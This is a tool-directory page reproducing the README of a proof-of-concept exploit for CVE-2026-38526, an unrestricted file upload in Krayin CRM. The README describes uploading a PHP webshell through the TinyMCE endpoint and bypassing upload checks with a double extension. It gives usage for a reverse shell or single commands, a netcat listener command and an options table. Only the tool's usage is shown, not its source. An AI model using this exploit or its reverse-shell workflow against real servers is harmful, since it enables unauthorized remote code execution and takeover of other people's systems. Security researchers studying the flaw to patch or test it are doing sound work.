Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-38526-POC — Proof of Concept of CVE-2026-38526 in Krayin CRM <= v2.2.x. Arbitrary File Upload leading to Remote Code Execution | Kitploit
Tools/GitHubGitHub/pawpic/cve-2026-38526-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Proof of Concept of CVE-2026-38526 in Krayin CRM <= v2.2.x. Arbitrary File Upload leading to Remote Code Execution

View Repository
21 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-38526 - Krayin CRM RCE Exploit

Krayin CRM (≤ 2.2.x) - Unrestricted File Upload leading to Remote Code Execution.

This PoC exploits the vulnerable TinyMCE upload endpoint (/admin/tinymce/upload) to upload a PHP webshell and achieve command execution on the server.


Features

  • Full automatic login with CSRF token handling
  • Bypasses upload restrictions using double extension
  • Supports reverse shell and single command execution
  • Reliable Laravel CSRF token refresh
  • Clean and easy to use

Downloading

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Requirements

root@kitploit:~
pip3 install requests beautifulsoup4

Usage

  1. Reverse Shell (Default & Recommended)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Single Command
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Options

Example Workflow

Start listener:

root@kitploit:~
nc -lvnp 4444

Run the exploit:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Disclaimer

This exploit is intended for educational purposes and authorized penetration testing only. Unauthorized use against systems you do not have explicit permission to test is illegal.

Affected Versions

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

Author: pawpic Date: 2026

Download Tool
ArgumentDescriptionRequired
-u, --urlTarget base URLYes
-e, --emailLogin emailYes
-p, --passwordLogin passwordYes
-c, --cmdExecute single commandNo
--lhostYour IP for reverse shellYes (if not using --cmd)
--lportListening portNo (default: 4444)